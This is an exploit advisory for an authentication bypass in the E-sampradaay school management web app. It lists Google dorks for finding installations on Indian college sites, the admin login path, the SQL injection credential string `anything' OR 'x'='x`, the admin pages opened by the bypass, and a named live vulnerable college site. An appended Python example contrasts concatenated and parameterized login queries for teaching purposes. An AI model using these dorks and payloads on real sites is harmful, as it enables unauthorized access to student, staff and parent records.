Vibrant Hardware and Software Solutions E-sampradaay India Improper Authorization Vulnerability

2018.11.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################

# Exploit Title : Vibrant Hardware and Software Solutions E-sampradaay Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 09/11/2018
# Vendor Homepage : vibrantitsolutions.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''Designed by Vibrant Hardware and Software Solutions'' site:edu.in
intext:''Designed : College ICT Laboratory'' site:edu.in
intext:''COPYRIGHT © 2016 VPCCECM & DEVELOPED BY VPC ICT LAB'' site:edu.in
intext:''© Copyright 2010 Vibrant IT Solutions Pvt. Ltd. All rights reserved.'' site:edu.in
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
CWE-284 [ Improper Access Control ]
CWE-285 [ Improper Authorization ]

#################################################################################################

# Admin Panel Login Path : /esampradaay/admin_login.php

Admin Username : anything' OR 'x'='x
Admin Password : anything' OR 'x'='x

/esampradaay/admin_dashboard.php
/esampradaay/vidya_teaching_staff.php
/esampradaay/vidya_staff_register.php
/esampradaay/student_registration.php
/esampradaay/Parent_registration.php
/esampradaay/Management_register.php
/esampradaay/Alumini_Register.php
/esampradaay/student_attendance_menu.php
/esampradaay/student_attendance_upload.php
/esampradaay/dailycwreportAdmin.php
/esampradaay/staff_attendance_menu.php
/esampradaay/class.php
/esampradaay/eventmenu.php
/esampradaay/admin_menu.php
/esampradaay/addRollNum.php
/esampradaay/delete_student.php
/esampradaay/circular_upload.php
/esampradaay/certificate_upload.php
/esampradaay/cirview.php
/esampradaay/update_student.php
/esampradaay/staff_login.php
/esampradaay/update_nonteaching.php

#################################################################################################

# Example Vulnerable Site =>

[+] vidyaprabodhinicollege.edu.in/esampradaay/admin_login.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
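
The advisory does not show the application's login code. As an added example (not code from the advisory or the vendor), the following contrasts a credential check built by string concatenation with a parameterized one, using the credential string listed above. The table, column and function names are assumptions, and SQLite stands in for the application's unknown database.

```python
import hashlib
import hmac
import os
import sqlite3

def _hash(password: str, salt: bytes) -> bytes:
    # Salted PBKDF2 so the stored value is never the plaintext password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    """Constructed sample store; schema and account are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, "
               "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", "S3cure-sample!", salt, _hash("S3cure-sample!", salt)))
    return db

def login_concat(db, username: str, password: str) -> bool:
    """Weak pattern: user input becomes part of the SQL text itself."""
    sql = ("SELECT 1 FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_param(db, username: str, password: str) -> bool:
    """Hardened pattern: input is bound as data; password verified outside SQL."""
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # Constant-time comparison of the derived hash with the stored one.
    return hmac.compare_digest(_hash(password, salt), stored)

if __name__ == "__main__":
    db = make_db()
    listed = "anything' OR 'x'='x"  # credential string quoted in the advisory
    for fn in (login_concat, login_param):
        print(fn.__name__,
              "| advisory string accepted:", fn(db, listed, listed),
              "| real password accepted:", fn(db, "admin", "S3cure-sample!"))
```

In the concatenated form the quote characters close the string literal and the trailing `OR 'x'='x'` makes the WHERE clause true for every row; in the parameterized form the same input is only ever compared as a literal username.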



Copyright 2018, cxsecurity.com

 
